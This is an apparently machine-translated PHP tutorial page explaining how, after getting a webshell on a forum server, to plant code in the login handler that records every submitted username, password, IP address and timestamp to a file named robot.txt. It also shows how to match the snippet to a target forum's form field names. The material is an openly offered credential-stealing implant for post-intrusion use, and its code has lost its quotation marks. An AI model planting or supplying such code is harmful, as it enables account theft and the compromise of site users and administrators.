Code to intercept PHP background login password_PHP tutorial-PHP Tutorial-php.cn

Code to intercept PHP background login password_PHP tutorial

WBOY

Release： 2016-07-13 17:43:58

Original

1067 people have browsed it

After getting the webshell, if you want to penetrate further, the password such as discuz is not directly encrypted with md5, so it is very difficult to crack. I wrote it once for Big Tou before, and yesterday Brother Piggy happened to use it, so I wrote it again. The code is relatively simple, just a few sentences, I will explain the principle in detail, and take care of friends who don’t know much about PHP.

if($_POST[loginsubmit]!=){ //Determine whether the login button is clicked

$sb=user:.$_POST[username].--passwd:.$_POST[password].--ip:.$HTTP_SERVER_VARS[REMOTE_ADDR].--.date(Y-m-d H:i:s). rn; // Concatenate the values received by POST and assign them to the variable $sb

fwrite(fopen(robot.txt,ab),$sb);} //The result is written to a file

The following is a brief analysis, taking Huaxia’s login page as an example. Open bbs.xxx.com/login.php, right-click to view the source code, CTRL+F search action to find the login form.

I only copied the key code.

. . . . Powerful ellipsis. . . . . .

Account(U):

class=input id=pwuser accessKey=u size=16

name=pwuser> //Input box for user name, pay attention to the value of name, which must correspond to $_POST[username], so the password of Huaxia must be intercepted , needs to be changed to $_POST[pwuser]

Password (P):

class=input id=pwpwd accessKey=p

type=password size=16 name=pwpwd> //Input box for user name, pay attention to the value of name, which should correspond to $_POST[username], So to intercept Huaxia’s password, you need to change it to $_POST[pwpwd]

Related labels：

discuz php webshell code Backstage password intercept Login of further

source：php.cn

Previous article：PHP+TEXT guestbook (2)_PHP tutorial Next article：Generate psd thumbnails with php_PHP tutorial

Statement of this Website

The content of this article is voluntarily contributed by netizens, and the copyright belongs to the original author. This site does not assume corresponding legal responsibility. If you find any content suspected of plagiarism or infringement, please contact admin@php.cn